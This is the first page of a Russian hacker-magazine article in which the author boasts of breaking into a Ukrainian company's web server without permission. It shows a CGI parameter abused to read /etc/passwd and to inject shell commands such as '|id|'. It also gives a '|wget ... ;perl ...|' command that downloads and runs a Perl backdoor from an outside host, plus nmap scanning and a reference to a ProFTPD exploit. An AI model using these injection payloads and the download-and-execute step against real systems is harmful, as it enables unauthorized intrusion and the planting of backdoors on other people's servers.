Оранжевая революция

Sashiks (lubimovv@inbox.ru)

Хакер, номер #076, стр. 076-048-1

Гуманистическая история взлома украинского сервера

Упорство в жизни – важная штука. Иногда бывает так, что, кажется, возможность что-то сделать уже ушла, однако если не сдаваться и бороться до последнего, все может измениться. Так во всем, и компьютерные взломы не исключение. Сегодня я расскажу тебе захватывающую историю атаки на один украинский сервер, во время осуществления которой у меня несколько раз возникало желание опустить руки. Однако упорство и вера в собственные силы позволили много добиться.

Интро

Я всегда любил фильмы про хакеров. Еще бы, исследования крупных сетей, взлом корпоративных серверов, кража конфиденциальной информации – все это действительно завораживает. И вот однажды поздно вечером я решил немного поиграть в хакеров и повеселиться. Ну что ж, сказано - сделано, just Google it! И вот на экране замелькали сотни разных украинских компаний, но среди прочих мое внимание привлек сайт какой-то непонятной организации, которая торговала то ли солью, то ли дорожным гравием, то ли вообще ничем не торговала, точно не помню. Ресурс привлек мое внимание тем, что в адресе найденной страницы находилась примерно такая строка: www.firmasite.ua/cgi-bin/index.cgi?newsfile=20050106.txt. Тут не надо быть компьютерным бизоном, чтобы догадаться: с помощью этого скрипта возможно просматривать файлы на сервере, а может быть, даже и исполнять команды. Что ж, попробуем.

Указав в качестве параметра newsfile название одного из файлов в текущем каталоге я увидел, что он действительно включился! Тогда я запустил скрипт так: index.cgi?newsfile=http://../../etc/passwd и увидел перед собой файл с учетными записями пользователей.

В принципе пока радоваться особенно было нечему, однако некоторые зацепки уже были. Я зашел на свой забугорный шелл и просканировал nmap’ом удаленный комп в поисках открытых tcp-портов и доступных сетевых демонов. Конечно, можно было сразу подставить вместо имени файла значок пайпа ("|") и ввести команду, однако я не хотел спешить.

Через некоторое время после запуска сканера выяснилось, что на ломаемой тачке кроме всего прочего крутится бажный ProFTPD 1.2.9, для которого есть публичный сплойт: www.securitylab.ru/_exploits/proftpd2.c.txt.

Однако как я и ожидал, этот эксплойт был не работоспособным и не выдал ничего полезного после нескольких минут перебора адреса возврата. Можно было конечно разобраться, в чем дело, однако у меня была идея получше. В имя открываемого файла я подставил строку “|id|" и тут же на главной странице получил убедительный ответ сервера: "nobody" . Ну что ж, пришло время решительных действий.

Внедряемся!

Итак, что у меня было в данный момент на руках. Во-первых, сервер не был защищен файрволом, что не могло не радовать. Во-вторых, я мог просматривать файлы и, что самое важное, выполнять команды с правами вебсервера. Итак, вперед с песней.

Была отдана команда "|wget http://host.ru/bd.pl -O /tmp/bd.pl;perl /tmp/bd.pl|", после чего на тачке, как и предполагалось, открылся всеми любимый перловый бэкдор на 37900 порту.

Содержание  Вперед на стр. 076-048-2
ttfb: 3.4160614013672 ms